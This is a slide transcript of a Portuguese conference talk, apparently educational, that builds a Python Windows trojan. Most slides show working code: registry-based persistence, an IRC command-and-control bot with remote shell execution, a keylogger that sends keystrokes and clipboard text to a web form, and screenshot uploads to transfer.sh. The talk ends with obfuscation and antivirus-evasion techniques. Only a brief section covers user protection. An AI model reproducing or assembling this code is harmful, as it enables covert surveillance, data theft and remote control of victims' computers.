Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Criando um malware com Python

yyyyyyyan
October 19, 2018
Programming
3
5.4k

Criando um malware com Python

Nos dias de hoje, segurança é um dos tópicos mais importantes em todo o universo da computação e, na verdade, do mundo no geral, envolvendo desde aspectos políticos, como no caso do vírus que afetou centrífugas iranianas, até o lado mais pessoal, como sua prima que teve a conta de uma rede social invadida e nunca entendeu como isso aconteceu. Mas como isso tudo funciona? Um simples malware é tão complicado assim de entender?

Nessa palestra, discutiremos um pouco sobre vírus de computador (leia-se malware) e como eles geralmente funcionam e afetam computadores pessoais. Aprenderemos técnicas e práticas de programação e computação que auxiliam esse tipo de programa e, com isso, construiremos nosso próprio malware em Python, com funcionalidades diversas de ataque, manutenção e defesa contra antivírus, dentre estas:

- Garantindo a execução repetida do malware

- Executando comandos no computador da vítima

- Captura de teclas (keylogger) e de tela

- Obtendo dados diversos da vítima

- Enganando a sandbox do antivírus

E mais, de acordo com o gosto do pessoal que estiver assistindo!

Saia da palestra como um novo hacker (ou melhor, especialista de segurança ;)) e abra caminhos para novas experiências na área de desenvolvimento.

yyyyyyyan

October 19, 2018
Tweet

More Decks by yyyyyyyan

See All by yyyyyyyan
como funcionam as senhas e por que não funcionam: tentando resolver um problema sem solução
yyyyyyyan
1
25
[PyCon APAC 2022] Writing secure code in Python
yyyyyyyan
1
150
Writing secure code in Python
yyyyyyyan
1
200
Escrevendo códigos seguros em Python
yyyyyyyan
2
330
Entendendo sockets no Python criando um bot de IRC
yyyyyyyan
1
370
Python 2 ou Python 3?
yyyyyyyan
1
120
Python 2 or Python 3? - (Finally) Understanding the differences between the two main versions of the language
yyyyyyyan
3
120
Creating a malware using Python
yyyyyyyan
1
490

Other Decks in Programming

See All in Programming
CSC509 Lecture 09
javiergs
PRO
0
130
色々なIaCツールを実際に触って比較してみる
iriikeita
0
310
CSC509 Lecture 08
javiergs
PRO
0
110
What’s New in Compose Multiplatform - A Live Tour (droidcon London 2024)
zsmb
1
440
WEBエンジニア向けAI活用入門
sutetotanuki
0
320
推し活としてのrails new/oshikatsu_ha_iizo
sakahukamaki
3
2k
AWS IaCの注目アップデート 2024年10月版
konokenj
3
3.2k
Ethereum_.pdf
nekomatu
0
340
Content Security Policy入門 セキュリティ設定と 違反レポートのはじめ方 / Introduction to Content Security Policy Getting Started with Security Configuration and Violation Reporting
uskey512
1
470
Nurturing OpenJDK distribution: Eclipse Temurin Success History and plan
ivargrimstad
0
310
アジャイルを支えるテストアーキテクチャ設計/Test Architecting for Agile
goyoki
9
3.1k
A Journey of Contribution and Collaboration in Open Source
ivargrimstad
0
310

Featured

See All Featured
Git: the NoSQL Database
bkeepers
PRO
427
64k
Speed Design
sergeychernyshev
24
580
Building Your Own Lightsaber
phodgson
102
6.1k
Stop Working from a Prison Cell
hatefulcrawdad
267
20k
Large-scale JavaScript Application Architecture
addyosmani
510
110k
Design and Strategy: How to Deal with People Who Don’t "Get" Design
morganepeng
126
18k
Art, The Web, and Tiny UX
lynnandtonic
297
20k
For a Future-Friendly Web
brad_frost
175
9.4k
No one is an island. Learnings from fostering a developers community.
thoeni
19
3k
Typedesign – Prime Four
hannesfritz
40
2.4k
Agile that works and the tools we love
rasmusluckow
327
21k
Designing on Purpose - Digital PM Summit 2013
jponch
115
6.9k

Transcript

  1. Olá! Eu sou Yan Orestes Produtor de conteúdo na 1

    @yanorestes

  2. Entendendo o funcionamento de um malware usando Python 2

  3. O que é um malware? Vamos entender esse conceito 3

  4. Malware 4 malicious software software malicioso

  5. Não é só vírus! 5 Ransomware Vírus Worm Malware ...

  6. Qual escolher? 6 Destrutivo Útil X

  7. Cavalo de Troia Dando o máximo de possibilidades para o

    atacante através do Command & Control (C&C) 7

  8. Como? 8

  9. Como? Python 9

  10. Como? Python Por quê? 10

  11. Como? Python Por quê? Por que não? 11

  12. Vítima Windows (8) 12

  13. Um vírus ineficiente destrói seu portador. Um vírus esperto fica

    com ele. 13 - James Lovelock

  14. Garantindo a execução contínua do malware 14 1.

  15. Escondendo o malware em outros programas Fácil de programar Pouca

    efetividade 15

  16. Modificando o Registro do Windows 16 Efetivo Necessita privilégios de

    administrador

  17. Registro 17 Chaves Subchaves

  18. HKEY_LOCAL_MACHINE Run 18

  19. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft \Windows\CurrentVersion\Run 19

  20. Como fazer isso no Python? 20

  21. Como fazer isso no Python? • winreg 21

  22. Como fazer isso no Python? • winreg • os 22

  23. 1. from os.path import realpath 2. from winreg import *

    3. 4. path_arquivo = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Não tá rodando como administrador :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, path_arquivo) 12. key.Close() 23

  24. 1. from os.path import realpath 2. from winreg import *

    3. 4. path_arquivo = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Não tá rodando como administrador :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, path_arquivo) 12. key.Close() 24

  25. 1. from os.path import realpath 2. from winreg import *

    3. 4. path_arquivo = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Não tá rodando como administrador :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, path_arquivo) 12. key.Close() 25

  26. 1. from os.path import realpath 2. from winreg import *

    3. 4. path_arquivo = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Não tá rodando como administrador :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, path_arquivo) 12. key.Close() 26

  27. 1. from os.path import realpath 2. from winreg import *

    3. 4. path_arquivo = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Não tá rodando como administrador :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, path_arquivo) 12. key.Close() 27

  28. 1. from os.path import realpath 2. from winreg import *

    3. 4. path_arquivo = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Não tá rodando como administrador :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, path_arquivo) 12. key.Close() 28

  29. Como estabelecer a comunicação entre atacante e vítima? 29

  30. Conectando a vítima ao atacante 30 2.

  31. Conexão direta entre atacante e vítima Maior controle Maior vulnerabilidade

    31

  32. Usando serviços externos (como Twitter) Fácil de programar Menos controle

    32

  33. Conectando através de uma rede IRC Maior controle Difícil de

    configurar 33

  34. IRC 34

  35. Como fazer isso no Python? 35

  36. Como fazer isso no Python? • socket 36

  37. 1. import socket 2. class ConexaoAtacante: 3. def __init__(self, endereco_irc):

    4. self.socket = socket.socket() 5. self.socket.connect(endereco_irc) 6. 7. conexao = ConexaoAtacante(('irc.pythonbrasil.net', 6667)) 37

  38. 1. import socket 2. class ConexaoAtacante: 3. def __init__(self, endereco_irc):

    4. self.socket = socket.socket() 5. self.socket.connect(endereco_irc) 6. 7. conexao = ConexaoAtacante(('irc.pythonbrasil.net', 6667)) 38 Só isso?

  39. 1. import socket 2. import re 3. class ConexaoAtacante: 4.

    def __init__(self, endereco_irc, nick): 5. self.socket = socket.socket() 6. self.socket.connect(endereco_irc) 7. self.registra_usuario(nick) 8. self.nick = nick 9. 10. def envia_comando(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def recebe_comando(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.responde_ping(msg) 18. return msg 19. def registra_usuario(self, nick): 20. self.envia_comando('NICK ' + nick) 21. self.envia_comando('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def responde_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.envia_comando('PONG :' + pong) 39

  40. 1. import socket 2. import re 3. class ConexaoAtacante: 4.

    def __init__(self, endereco_irc, nick): 5. self.socket = socket.socket() 6. self.socket.connect(endereco_irc) 7. self.registra_usuario(nick) 8. self.nick = nick 9. 10. def envia_comando(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def recebe_comando(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.responde_ping(msg) 18. return msg 19. def registra_usuario(self, nick): 20. self.envia_comando('NICK ' + nick) 21. self.envia_comando('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def responde_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.envia_comando('PONG :' + pong) 40

  41. 1. import socket 2. import re 3. class ConexaoAtacante: 4.

    def __init__(self, endereco_irc, nick): 5. self.socket = socket.socket() 6. self.socket.connect(endereco_irc) 7. self.registra_usuario(nick) 8. self.nick = nick 9. 10. def envia_comando(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def recebe_comando(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.responde_ping(msg) 18. return msg 19. def registra_usuario(self, nick): 20. self.envia_comando('NICK ' + nick) 21. self.envia_comando('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def responde_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.envia_comando('PONG :' + pong) 41

  42. 1. import socket 2. import re 3. class ConexaoAtacante: 4.

    def __init__(self, endereco_irc, nick): 5. self.socket = socket.socket() 6. self.socket.connect(endereco_irc) 7. self.registra_usuario(nick) 8. self.nick = nick 9. 10. def envia_comando(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def recebe_comando(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.responde_ping(msg) 18. return msg 19. def registra_usuario(self, nick): 20. self.envia_comando('NICK ' + nick) 21. self.envia_comando('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def responde_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.envia_comando('PONG :' + pong) 42

  43. 1. import socket 2. import re 3. class ConexaoAtacante: 4.

    def __init__(self, endereco_irc, nick): 5. self.socket = socket.socket() 6. self.socket.connect(endereco_irc) 7. self.registra_usuario(nick) 8. self.nick = nick 9. 10. def envia_comando(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def recebe_comando(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.responde_ping(msg) 18. return msg 19. def registra_usuario(self, nick): 20. self.envia_comando('NICK ' + nick) 21. self.envia_comando('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def responde_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.envia_comando('PONG :' + pong) 43

  44. 1. import socket 2. import re 3. class ConexaoAtacante: 4.

    def __init__(self, endereco_irc, nick): 5. self.socket = socket.socket() 6. self.socket.connect(endereco_irc) 7. self.registra_usuario(nick) 8. self.nick = nick 9. 10. def envia_comando(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def recebe_comando(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.responde_ping(msg) 18. return msg 19. def registra_usuario(self, nick): 20. self.envia_comando('NICK ' + nick) 21. self.envia_comando('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def responde_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.envia_comando('PONG :' + pong) 44

  45. 1. conexao = ConexaoAtacante(('irc.pythonbrasil.net', 6667), 'MalwareBot') 2. while True: 3.

    cmd = conexao.recebe_comando() 4. # tratar comando recebido Main Loop 45

  46. Como tomar o controle do computador da vítima? 46

  47. Executando comandos no computador da vítima 47 3.

  48. Usando os.system() Muita simplicidade Pouca flexibilidade 48

  49. Muita flexibilidade 49 Usando o módulo subprocess

  50. Usando o módulo subprocess Muita flexibilidade Quê? 50

  51. 51

  52. 52

  53. 53 1. from subprocess import run, PIPE, STDOUT 2. 3.

    def roda_comando_no_shell(cmd): 4. processo_completo = run(cmd, shell=True, stdout=PIPE, stderr=STDOUT) 5. resposta = processo_completo.stdout.decode('utf8', errors='ignore') 6. return resposta

  54. 54 mas e a comunicação com o atacante? 1. from

    subprocess import run, PIPE, STDOUT 2. 3. def roda_comando_no_shell(cmd): 4. processo_completo = run(cmd, shell=True, stdout=PIPE, stderr=STDOUT) 5. resposta = processo_completo.stdout.decode('utf8', errors='ignore') 6. return resposta

  55. 55 1. class ConexaoAtacante: 2. # Código omitido 3. def

    parse_msg(self, msg): 4. match = re.match(':(.*)!.*@.*(?:\..*)* PRIVMSG {} :(.*)'.format(self.nick), msg) 5. return match 6. 7. def recebe_comando(self): 8. msg = self.socket.recv(4096).decode('utf8', errors='ignore') 9. self.responde_ping(msg) 10. msg_match = self.parse_msg(msg) 11. if msg_match: 12. return msg_match.groups() 13. return None, None 14. # Código omitido

  56. 56 1. class ConexaoAtacante: 2. # Código omitido 3. def

    parse_msg(self, msg): 4. match = re.match(':(.*)!.*@.*(?:\..*)* PRIVMSG {} :(.*)'.format(self.nick), msg) 5. return match 6. 7. def recebe_comando(self): 8. msg = self.socket.recv(4096).decode('utf8', errors='ignore') 9. self.responde_ping(msg) 10. msg_match = self.parse_msg(msg) 11. if msg_match: 12. return msg_match.groups() 13. return None, None 14. # Código omitido

  57. 57 1. class ConexaoAtacante: 2. # Código omitido 3. def

    parse_msg(self, msg): 4. match = re.match(':(.*)!.*@.*(?:\..*)* PRIVMSG {} :(.*)'.format(self.nick), msg) 5. return match 6. 7. def recebe_comando(self): 8. msg = self.socket.recv(4096).decode('utf8', errors='ignore') 9. self.responde_ping(msg) 10. msg_match = self.parse_msg(msg) 11. if msg_match: 12. return msg_match.groups() 13. return None, None 14. # Código omitido

  58. 58 1. conexao = ConexaoAtacante(('irc.rizon.net', 6667), 'MalwareBot') 2. comandos =

    {'!shell':roda_comando_no_shell} 3. re_comandos = '|'.join(comandos.keys()) 4. while True: 5. nick_recebido, cmd = conexao.recebe_comando() 6. cmd_match = re.match('({})(?: (.*))?'.format(re_comandos), cmd) 7. if cmd_match: 8. cmd_tipo, args = cmd_match.groups() 9. resposta = comandos[cmd_tipo](args) 10. else: 11. resposta = 'Comando não encontrado' 12. conexao.envia_comando('PRIVMSG {} :{}'.format(nick_recebido, resposta))

  59. 59 1. conexao = ConexaoAtacante(('irc.rizon.net', 6667), 'MalwareBot') 2. comandos =

    {'!shell':roda_comando_no_shell} 3. re_comandos = '|'.join(comandos.keys()) 4. while True: 5. nick_recebido, cmd = conexao.recebe_comando() 6. cmd_match = re.match('({})(?: (.*))?'.format(re_comandos), cmd) 7. if cmd_match: 8. cmd_tipo, args = cmd_match.groups() 9. resposta = comandos[cmd_tipo](args) 10. else: 11. resposta = 'Comando não encontrado' 12. conexao.envia_comando('PRIVMSG {} :{}'.format(nick_recebido, resposta))

  60. 60 1. conexao = ConexaoAtacante(('irc.rizon.net', 6667), 'MalwareBot') 2. comandos =

    {'!shell':roda_comando_no_shell} 3. re_comandos = '|'.join(comandos.keys()) 4. while True: 5. nick_recebido, cmd = conexao.recebe_comando() 6. cmd_match = re.match('({})(?: (.*))?'.format(re_comandos), cmd) 7. if cmd_match: 8. cmd_tipo, args = cmd_match.groups() 9. resposta = comandos[cmd_tipo](args) 10. else: 11. resposta = 'Comando não encontrado' 12. conexao.envia_comando('PRIVMSG {} :{}'.format(nick_recebido, resposta))

  61. 61 1. conexao = ConexaoAtacante(('irc.rizon.net', 6667), 'MalwareBot') 2. comandos =

    {'!shell':roda_comando_no_shell} 3. re_comandos = '|'.join(comandos.keys()) 4. while True: 5. nick_recebido, cmd = conexao.recebe_comando() 6. cmd_match = re.match('({})(?: (.*))?'.format(re_comandos), cmd) 7. if cmd_match: 8. cmd_tipo, args = cmd_match.groups() 9. resposta = comandos[cmd_tipo](args) 10. else: 11. resposta = 'Comando não encontrado' 12. conexao.envia_comando('PRIVMSG {} :{}'.format(nick_recebido, resposta))

  62. 62 1. conexao = ConexaoAtacante(('irc.rizon.net', 6667), 'MalwareBot') 2. comandos =

    {'!shell':roda_comando_no_shell} 3. re_comandos = '|'.join(comandos.keys()) 4. while True: 5. nick_recebido, cmd = conexao.recebe_comando() 6. cmd_match = re.match('({})(?: (.*))?'.format(re_comandos), cmd) 7. if cmd_match: 8. cmd_tipo, args = cmd_match.groups() 9. resposta = comandos[cmd_tipo](args) 10. else: 11. resposta = 'Comando não encontrado' 12. conexao.envia_comando('PRIVMSG {} :{}'.format(nick_recebido, resposta))

  63. Capturando dados do usuário em tempo real 63 4.

  64. Capturando teclas digitadas (keylogger) 64

  65. Como fazer isso no Python? 65

  66. Como fazer isso no Python? • keyboard https://github.com/boppreh/keyboard 66

  67. Como fazer isso no Python? • keyboard • requests http://docs.python-requests.org/en/master

    / 67

  68. Como fazer isso no Python? • keyboard • requests •

    pyperclip https://github.com/asweigart/pyperclip 68

  69. 1. import keyboard 2. 3. teclas_apertadas = [] 4. keyboard.on_press(lambda

    k: teclas_apertadas.append(k.name)) 69

  70. Hello, world! 70 1. import keyboard 2. 3. teclas_apertadas =

    [] 4. keyboard.on_press(lambda k: teclas_apertadas.append(k.name))

  71. Hello, world! shiftHello,spaceworldshift! 71 1. import keyboard 2. 3. teclas_apertadas

    = [] 4. keyboard.on_press(lambda k: teclas_apertadas.append(k.name))

  72. 1. import keyboard 2. 3. teclas_apertadas = [] 4. teclas_especiais

    = {'space':' ', 'enter':'\n'} 5. 6. def trata_tecla(k): 7. if 'shift' in k.modifiers: 8. teclas_apertadas.pop() 9. tecla = k.nome 10. if len(tecla) > 1: 11. tecla = teclas_especiais.get(tecla, '<< {} >>'.format(tecla)) 12. teclas_apertadas.append(tecla) 13. 14. keyboard.on_press(trata_tecla) 72

  73. 1. import keyboard 2. 3. teclas_apertadas = [] 4. teclas_especiais

    = {'space':' ', 'enter':'\n'} 5. 6. def trata_tecla(k): 7. if 'shift' in k.modifiers: 8. teclas_apertadas.pop() 9. tecla = k.nome 10. if len(tecla) > 1: 11. tecla = teclas_especiais.get(tecla, '<< {} >>'.format(tecla)) 12. teclas_apertadas.append(tecla) 13. 14. keyboard.on_press(trata_tecla) 73

  74. 1. import keyboard 2. 3. teclas_apertadas = [] 4. teclas_especiais

    = {'space':' ', 'enter':'\n'} 5. 6. def trata_tecla(k): 7. if 'shift' in k.modifiers: 8. teclas_apertadas.pop() 9. tecla = k.nome 10. if len(tecla) > 1: 11. tecla = teclas_especiais.get(tecla, '<< {} >>'.format(tecla)) 12. teclas_apertadas.append(tecla) 13. 14. keyboard.on_press(trata_tecla) 74

  75. 1. import keyboard 2. 3. teclas_apertadas = [] 4. teclas_especiais

    = {'space':' ', 'enter':'\n'} 5. 6. def trata_tecla(k): 7. if 'shift' in k.modifiers: 8. teclas_apertadas.pop() 9. tecla = k.nome 10. if len(tecla) > 1: 11. tecla = teclas_especiais.get(tecla, '<< {} >>'.format(tecla)) 12. teclas_apertadas.append(tecla) 13. 14. keyboard.on_press(trata_tecla) 75

  76. 1. import keyboard 2. 3. teclas_apertadas = [] 4. teclas_especiais

    = {'space':' ', 'enter':'\n'} 5. 6. def trata_tecla(k): 7. if 'shift' in k.modifiers: 8. teclas_apertadas.pop() 9. tecla = k.nome 10. if len(tecla) > 1: 11. tecla = teclas_especiais.get(tecla, '<< {} >>'.format(tecla)) 12. teclas_apertadas.append(tecla) 13. 14. keyboard.on_press(trata_tecla) 76 e como o atacante acessa isso?

  77. 1. from requests import post 2. 3. url_form = #linkParaForm#

    4. def trata_tecla(k): 5. # Código omitido 6. if len(teclas_apertadas) >= 100: 7. texto_digitado = ''.join(teclas_apertadas) 8. teclas_apertadas.clear() 9. post(url_form, {'entry.1269107664':texto_digitado}) 77

  78. 1. from requests import post 2. 3. url_form = #linkParaForm#

    4. def trata_tecla(k): 5. # Código omitido 6. if len(teclas_apertadas) >= 100: 7. texto_digitado = ''.join(teclas_apertadas) 8. teclas_apertadas.clear() 9. post(url_form, {'entry.1269107664':texto_digitado}) 78

  79. 1. from requests import post 2. 3. url_form = #linkParaForm#

    4. def trata_tecla(k): 5. # Código omitido 6. if len(teclas_apertadas) >= 100: 7. texto_digitado = ''.join(teclas_apertadas) 8. teclas_apertadas.clear() 9. post(url_form, {'entry.1269107664':texto_digitado}) 79

  80. 80 1. from requests import post 2. 3. url_form =

    #linkParaForm# 4. def trata_tecla(k): 5. # Código omitido 6. if len(teclas_apertadas) >= 100: 7. texto_digitado = ''.join(teclas_apertadas) 8. teclas_apertadas.clear() 9. post(url_form, {'entry.1269107664':texto_digitado})

  81. Toque de ouro 81

  82. Toque de ouro 1. from pyperclip import paste 2. 3.

    def trata_copypaste(): 4. texto_copiado = paste() 5. teclas_apertadas.extend(list(texto_copiado)) 6. 7. keyboard.add_hotkey('ctrl+c', trata_copypaste) 82

  83. Capturando a tela da vítima 83

  84. Como fazer isso no Python? 84

  85. Como fazer isso no Python? • pyscreenshot https://github.com/ponty/pyscreensho t 85

  86. Como fazer isso no Python? • pyscreenshot • os 86

  87. Como fazer isso no Python? • pyscreenshot • os •

    requests 87

  88. 1. from pyscreenshot import grab_to_file 2. 3. def tira_screenshot(filename): 4.

    grab_to_file(filename) 88

  89. 1. from pyscreenshot import grab_to_file 2. 3. def tira_screenshot(filename): 4.

    grab_to_file(filename) 5. 6. comandos = {'!shell': roda_comando_no_shell, '!screenshot': tira_screenshot} 89

  90. 1. from pyscreenshot import grab_to_file 2. 3. def tira_screenshot(filename): 4.

    grab_to_file(filename) 5. 6. comandos = {'!shell': roda_comando_no_shell, '!screenshot': tira_screenshot} 90 e como o atacante acessa isso?

  91. 1. from pyscreenshot import grab_to_file 2. from requests import post

    3. 4. def tira_screenshot(filename): 5. grab_to_file(filename) 6. with open(filename, 'rb') as f: 7. r = post('https://transfer.sh', files={filename: f}) 8. resposta = r.text if r.status_code == 200 else 'Erro no upload' 9. return resposta 91

  92. 1. from pyscreenshot import grab_to_file 2. from requests import post

    3. 4. def tira_screenshot(filename): 5. grab_to_file(filename) 6. with open(filename, 'rb') as f: 7. r = post('https://transfer.sh', files={filename: f}) 8. resposta = r.text if r.status_code == 200 else 'Erro no upload' 9. return resposta 92

  93. 1. from os import remove 2. from pyscreenshot import grab_to_file

    3. from requests import post 4. 5. def tira_screenshot(filename): 6. grab_to_file(filename) 7. with open(filename, 'rb') as f: 8. r = post('https://transfer.sh', files={filename: f}) 9. resposta = r.text if r.status_code == 200 else 'Erro no upload' 10. return resposta 11. remove(filename) 93

  94. Extra! 94

  95. Ofuscação de código 95 5.

  96. Compilar para bytecode Fácil Facilmente recuperável 96

  97. Usando pyminifier Divertido Recuperável 97

  98. 98 Usando pyminifier 1. pyminifier -O -o nivel1.py malware.py

  99. 99 Usando pyminifier 1. pyminifier -O -o nivel1.py malware.py 2.

    pyminifier -O --nonlatin -o nivel2.py malware.py

  100. 100 Usando pyminifier 1. pyminifier -O -o nivel1.py malware.py 2.

    pyminifier -O --nonlatin -o nivel2.py malware.py 3. pyminifier -O --nonlatin --replacement-length=100 -o nivel3.py malware.py

  101. 101 Usando pyminifier 1. pyminifier -O -o nivel1.py malware.py 2.

    pyminifier -O --nonlatin -o nivel2.py malware.py 3. pyminifier -O --nonlatin --replacement-length=100 -o nivel3.py malware.py 4. pyminifier -O --nonlatin --replacement-length=100 --gzip -o nivel4.py malware.py

  102. Escalonamento de privilégios 102 6.

  103. Escalonamento de privilégios 103 6. • Brute force

  104. Escalonamento de privilégios 104 6. • Brute force • Injeção

    de código

  105. 105 E como o usuário pode se proteger?

  106. Precaução 106

  107. Controle das conexões 107

  108. Antivírus? 108

  109. 109 O melhor antivírus é o bom senso - Anônimo

    entendedor de tudo

  110. 110 O melhor antivírus é o bom senso - Anônimo

    entendedor de tudo Será?

  111. Antivírus são insuportáveis 111

  112. Antivírus são insuportáveis 112 Taxas de renovação inesperadas

  113. Antivírus são insuportáveis 113 Taxas de renovação inesperadas Problemas com

    o sistema

  114. Antivírus são insuportáveis 114 Taxas de renovação inesperadas Problemas com

    o sistema aaaaaaaaaaaaaaaaaaaaaaaaa

  115. 2010 - Caso McAfee 115

  116. 2010 - Caso McAfee 116 2011 - Caso MSE

  117. 2010 - Caso McAfee 117 2011 - Caso MSE 2012

    - Caso Sophos

  118. Efetividade baixa 118 2006 - 40-50% 2007 - 20-30%

  119. Efetividade baixa? 119 2006 - 40-50% 2007 - 20-30% 2013

    - 91.1-99.9%

  120. 120 Humanos falham

  121. A não ser que você... 121 • Não compartilhe arquivos

    e/ou links com ninguém • Não permita que ninguém além de você use seu computador • Não use a Internet para compras, entretenimento adulto ou jogos online • Nunca utilize uma rede WiFi pública • Não compartilhe o seu WiFi privado com ninguém • Nunca clique em nenhuma propaganda • Utilize senhas extremamente seguras e nunca repete nenhuma • Não utilize um smartphone • Não faça download de nada pela Internet

  122. A não ser que você... 122 • Não compartilhe arquivos

    e/ou links com ninguém • Não permita que ninguém além de você use seu computador • Não use a Internet para compras, entretenimento adulto ou jogos online • Nunca utilize uma rede WiFi pública • Não compartilhe o seu WiFi privado com ninguém • Nunca clique em nenhuma propaganda • Utilize senhas extremamente seguras e nunca repete nenhuma • Não utilize um smartphone • Não faça download de nada pela Internet • Não utilize um sistema operacional

  123. Proteção contra antivírus 123 7. •

  124. Proteção contra antivírus 124 7. • Assinatura => Código polimórfico

  125. Proteção contra antivírus 125 7. • Assinatura => Código polimórfico

    • Sandbox => Detecção (mouse) https://github.com/boppreh/mouse/

  126. Proteção contra antivírus 126 7. • Assinatura => Código polimórfico

    • Sandbox => Detecção (mouse) • Método heurístico => ?

  127. Muito obrigado! Alguma pergunta? Você pode falar comigo em ▪

    @yanorestes ▪ [email protected] 127 https://speakerdeck.com/yanorestes/criando-um-malware-com-python

  128. Agradecimentos especiais ▪ Python Brasil ▪ Roosevelt Fujikawa ([email protected]) ▪

    Alura/Caelum ▪ Casa do Código (PythonBrasil&CasadoCodigo) 128 15%

  129. Design da apresentação Essa apresentação usa as seguintes fontes: ▪

    Títulos: Work sans bold ▪ Corpo: Work sans light ▪ Código: Arial com formatação do tohtml.com Você pode baixar as fontes nessa página https://github.com/weiweihuanghuang/Work-Sans/tree/master/fonts/desktop 129 Layout dos slides e ícones por SlidesCarnival